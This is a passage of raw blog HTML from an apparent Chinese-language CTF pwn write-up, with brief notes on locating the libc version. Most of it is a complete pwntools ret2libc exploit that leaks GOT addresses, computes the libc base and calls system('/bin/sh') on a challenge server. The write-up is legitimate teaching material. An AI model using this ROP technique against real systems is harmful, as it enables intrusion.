data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-22.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-155\"  sizes=\"auto, (max-width: 378px) 100vw, 378px\" \/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\uff08\u503c\u5f97\u6ce8\u610f\u7684\u662f\uff0c\u7531\u4e8e<code>libc<\/code>\u6bcf\u4e00\u6b21\u8fd0\u884c\u7684\u57fa\u5740\u90fd\u662f\u4e0d\u4e00\u6837\u7684\uff0c\u6240\u4ee5\u6bcf\u4e00\u6b21\u8fd0\u884c\u5f97\u5230\u7684\u7ed3\u679c\u90fd\u4e0d\u540c)\uff0c\u90a3\u4e48\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u5728libc-database\u4e2d\u8fdb\u884c\u5982\u4e0b\u64cd\u4f5c\u627e\u5230\u4e24\u4e2a<code>libc<\/code>\u7248\u672c\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-23.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-23-1024x266.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"266\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-23-1024x266.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-156\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" 
\/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u6211\u4eec\u53ef\u4ee5\u770b\u5230\u5bf9\u4e8e\u8fd9\u4e24\u4e2alibc\u7248\u672c\u5173\u952e\u5185\u5bb9\u5982\u4e0b\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-24.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-24.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"790\" height=\"884\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-24.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-157\"  sizes=\"auto, (max-width: 790px) 100vw, 790px\" \/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\u5bf9\u6bd4\u53d1\u73b0\u5173\u952e\u5185\u5bb9\u5747\u4e00\u81f4\uff08\u7279\u522b\u662f\u6211\u4eec\u5173\u5fc3\u7684<code>system<\/code>\u51fd\u6570\u548c<code>\/bin\/sh<\/code>\u5b57\u7b26\u4e32)<\/p>\n\n\n\n<p>\u6211\u4eec\u4efb\u9009\u4e00\u4e2a\u4e0b\u8f7d\uff0c\u4e4b\u540e\u901a\u8fc7\u5982\u4e0b\u4ee3\u7801\u5c31\u53ef\u4ee5\u5f97\u5230shell\u4e86\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 
16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>from pwn import *  \n\np = remote(\"node4.anna.nssctf.cn\", 28516)  \nelf = ELF(\".\/pwn (8)\")  \nlibc = ELF(\".\/libc6_2.23-0ubuntu10_amd64.so\")  \n\nputs_plt = elf.plt&#91;'puts'&#93;  \nputs_got = elf.got&#91;'puts'&#93;  \nread_got = elf.got&#91;'read'&#93;  \npop_rdi = 0x400733  \nret = 0x4004c9  \nvuln = 0x40067D  \n\npayload = b'a' * 0x20 + b'=Triode=' + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(vuln)  \n\np.sendlineafter(b\"Pull up your sword and tell me u story!\", payload)  \n\nputs_real = u64(p.recvuntil(b'\\x7f')&#91;-6:&#93;.ljust(8, b'\\x00'))  \nprint(\"&#91;+&#93; The real address of puts is\", hex(puts_real))  \n\npayload = b'a' * 0x20 + b'=Triode=' + p64(pop_rdi) + p64(read_got) + p64(puts_plt) + p64(vuln)  \n\np.sendlineafter(b\"Pull up your sword and tell me u story!\", payload)  \n\nread_real = u64(p.recvuntil(b'\\x7f')&#91;-6:&#93;.ljust(8, b'\\x00'))  \nprint(\"&#91;+&#93; The real address of read is\", hex(read_real))  \n\nlibc_base = puts_real - libc.sym&#91;\"puts\"&#93;  \nprint(\"&#91;+&#93; The base address of libc is\", hex(libc_base))  \n\nsystem = libc_base + 
libc.sym&#91;\"system\"&#93;  \nsh = libc_base + next(libc.search(b\"\/bin\/sh\"))  \n\npayload = b'a' * 0x20 + b'=Triode=' + p64(pop_rdi) + p64(sh) + p64(system) + p64(vuln)  \n\np.sendlineafter(b\"Pull up your sword and tell me u story!\", payload)  \np.interactive()<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #81A1C1\">from<\/span><span style=\"color: #D8DEE9FF\"> pwn <\/span><span style=\"color: #81A1C1\">import<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">remote<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">node4.anna.nssctf.cn<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #B48EAD\">28516<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">elf <\/span><span 
style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">ELF<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">.\/pwn (8)<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">libc <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">ELF<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">.\/libc6_2.23-0ubuntu10_amd64.so<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">puts_plt <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> elf<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">plt<\/span><span style=\"color: #ECEFF4\">&#91;<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">puts<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">&#93;<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">puts_got <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> elf<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">got<\/span><span style=\"color: #ECEFF4\">&#91;<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">puts<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">&#93;<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">read_got 
<\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> elf<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">got<\/span><span style=\"color: #ECEFF4\">&#91;<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">read<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">&#93;<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">pop_rdi <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">400733<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">ret <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">4004c9<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">vuln <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">40067D<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">a<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">20<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> 
<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">=Triode=<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">pop_rdi<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">puts_got<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">puts_plt<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">vuln<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">sendlineafter<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">Pull up your sword and tell me u story!<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> payload<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: 
#D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">puts_real <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">u64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">recvuntil<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #EBCB8B\">\\x7f<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">)&#91;<\/span><span style=\"color: #81A1C1\">-<\/span><span style=\"color: #B48EAD\">6<\/span><span style=\"color: #ECEFF4\">:&#93;.<\/span><span style=\"color: #88C0D0\">ljust<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">8<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #EBCB8B\">\\x00<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">))<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #88C0D0\">print<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">&#91;+&#93; The real address of puts is<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">hex<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">puts_real<\/span><span style=\"color: #ECEFF4\">))<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: 
#81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">a<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">20<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">=Triode=<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">pop_rdi<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">read_got<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">puts_plt<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">vuln<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span 
class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">sendlineafter<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">Pull up your sword and tell me u story!<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> payload<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">read_real <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">u64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">recvuntil<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #EBCB8B\">\\x7f<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">)&#91;<\/span><span style=\"color: #81A1C1\">-<\/span><span style=\"color: #B48EAD\">6<\/span><span style=\"color: #ECEFF4\">:&#93;.<\/span><span style=\"color: #88C0D0\">ljust<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">8<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #EBCB8B\">\\x00<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">))<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #88C0D0\">print<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span 
style=\"color: #A3BE8C\">&#91;+&#93; The real address of read is<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">hex<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">read_real<\/span><span style=\"color: #ECEFF4\">))<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">libc_base <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> puts_real <\/span><span style=\"color: #81A1C1\">-<\/span><span style=\"color: #D8DEE9FF\"> libc<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">sym<\/span><span style=\"color: #ECEFF4\">&#91;<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">puts<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">&#93;<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #88C0D0\">print<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">&#91;+&#93; The base address of libc is<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">hex<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">libc_base<\/span><span style=\"color: #ECEFF4\">))<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">system <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> libc_base <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> libc<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: 
#D8DEE9FF\">sym<\/span><span style=\"color: #ECEFF4\">&#91;<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">system<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">&#93;<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">sh <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> libc_base <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">next<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">libc<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">search<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">\/bin\/sh<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">))<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">a<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">20<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">=Triode=<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: 
#81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">pop_rdi<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">sh<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">system<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">vuln<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">sendlineafter<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">Pull up your sword and tell me u story!<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> payload<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">interactive<\/span><span style=\"color: 
